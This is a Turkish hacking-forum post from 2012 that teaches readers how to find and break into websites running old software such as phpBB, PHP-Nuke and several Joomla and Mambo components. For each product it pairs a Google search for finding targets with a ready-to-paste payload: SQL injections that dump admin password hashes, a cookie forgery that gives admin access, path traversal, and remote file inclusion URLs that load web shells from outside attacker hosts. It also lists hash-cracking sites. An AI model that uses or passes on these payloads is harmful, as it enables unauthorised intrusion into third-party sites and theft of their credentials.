İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Hangi Site Nasıl Hacklenir ??? /CoLTFeeT06

08-03-2012 00:15
#1
CoLTFeeT06 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
ANKARA
Yaş:
26
Mesajlar:
1.648
Teşekkür (Etti):
96
Teşekkür (Aldı):
383
Konular:
247
Ticaret:
(0) %
-MİNİ NUKE V2.3

Mini nuke sitelerle uğraşmak için ilk önce

wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.

Karşımıza gelen sitelerin sonuna

:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1

Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.

MD5 i kırmak içinde

http://passcrack.spb.ru/
Notice
color=#0000ffhttp://us.md5.crysm.net
color=#0000ffhttp://md5.rednoize.com
http://ice.breaker.free.fr/
http://www.milw0rm.com/md5/
color=#0000ffhttp://shm.hard-core.pl/md5/
color=#0000ffhttp://www.hashchecker.com
Ophcrack
color=#0000ffhttp://md5.benramsey.com
color=#0000ffhttp://md5.altervista.org
color=#0000ffhttp://shm.hard-core.pl
plain-text.info - Informationen zum Thema plain text. Diese Website steht zum Verkauf!
color=#0000ffhttp://www.md5lookup.com
color=#0000ffhttp://www.passcracking.ru
color=#0000ffhttp://www.md5lookup.com
color=#0000ffhttp://www.passcracking.ru/
color=#0000ffhttp://www.securitystats.com/tools/hashcrack.php

---------------------------------------------------------------------------

-VİRTUAL WAR V.1.0

ilk önce Google ’Powered by: Virtual War v1.5.0’

Sonu /war.php olan siteleri seçiyoruz ve
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=159480

war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.

Artık admin palenelindeyiz

[Eski bir açık olduğu için sonuç alamayabilirsiniz]


---------------------------------------------------------------------------
---
-PHPBB 2.0.11

işte meşhur phpbb açığı

Bize gereken en önemli program :

Free Downloads at TopShareware.com. Software and Free Game Downloads Center [Cooike Editör]

Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.

Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından

kurban phpbb 2.0.11 sitemizi seçicez.

Sitemizi bulduk 2 kez tıklıyoruz.

Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik

Kubidik Kodlar Gelicek Üssteki Kodu Slip

a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz

Saveliyoruz.

Artık cooike editör ile işimiz bitti

Sitemizi yeniliyoruz bakıyoruz aaaa adminiz

---------------------------------------------------------------------------
-----
-PHP NUKE SQL INJECTİON

Google a giriyoruz aranacak kelimeye

’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.

Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi

Search bölümünü bulamadıysanız

www.hackleneceksite.com/modules.php?name=Search

Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.


---------------------------------------------------------------------------
------
-COM_REMOSİTORY

Google ’’inurl:"com_remository"

Bulduğumuz sitelere

http://[sitepath]/[joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php

Kodunu ekliyoruz...

---------------------------------------------------------------------------
-----------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT

Google ’inurl:modules/myAds/’

Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.

color=#0000ffhttp://www.site.com/modules/myAds/an...rs+limit+1*1/*

Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...

---------------------------------------------------------------------------
-------------
-TOPLİST HACK PHPBB

GoogLe Arama : inurl:"toplist.php" "powered by phpbb"


Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls

--------------
- PC_COOKBOOK JOOMLA COMPONENT

- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities

- Author: JaheeMCreW

- Uygulama : pc_cookbook Component

- Version : koyans 0.3

Yapmaniz gereken bir arama moturunda örnek google’ da

" allinurl:com_pccookbook " olarak aratmaktir..

Exploit :

http://[target]/[path]/compo...osConfig_absol ute_path=http://evilscript

---------------------------------------------------------------------------
-------------
-SİMPLE BOARD MAMBO

İlk Önce WwwW.GoogLe.com

Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...

color=#0000ffhttp://site.com/components/com_simpl...me%20-a;id;pwd
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=159480

---------------------------------------------------------------------------
-------------
-ShoutBox IncLusion

shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...

Code:

/shoutbox/expanded.php?conf=


GoogLe Arama : inurl:"/shoutbox/expanded.php?"

---------------------------------------------------------------------------
--------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION

Google Search=inurl:classified.php phpbazar

color=#0000ffhttp://hedefsite.com/classified_righ...ell.txt?cmd=id

---------------
-BoastMachine [bmachine]

yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :

site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin

şifresini görüyoruz : )

---------------------------------------------------------------------------
----------------
-Limbo CMS <= 1.04 Remote File Inclusion

GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"


Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls


-CaLogic Calendars V1.2.2 - Remote File Include

GoogLe Arama : CaLogic Calendars V1.2.2

kullanmak için :

http://site.com/[path]/reconfig....1;evil_script]
http://site.com/[path]/srxclr.ph...1;evil_script]


---------------------------------------------------------------------------
------------------
-PafileDB Remote File Inclusion [phpBB]

PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..


color=#0000ffhttp://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]/

---------------------------------------------------------------------------
-------------------
-JetBox CMS Remote File Include [ RFI ]

Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..

Uretici Firma : color=#0000ffhttp://jetbox.streamedge.com/

JetBox CMS Remote File Include

http://[domain]/ /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..

GoogLe arama : Powered by Jetbox

---------------------------------------------------------------------------
---------------------


Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?

CoLTFeeT06


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı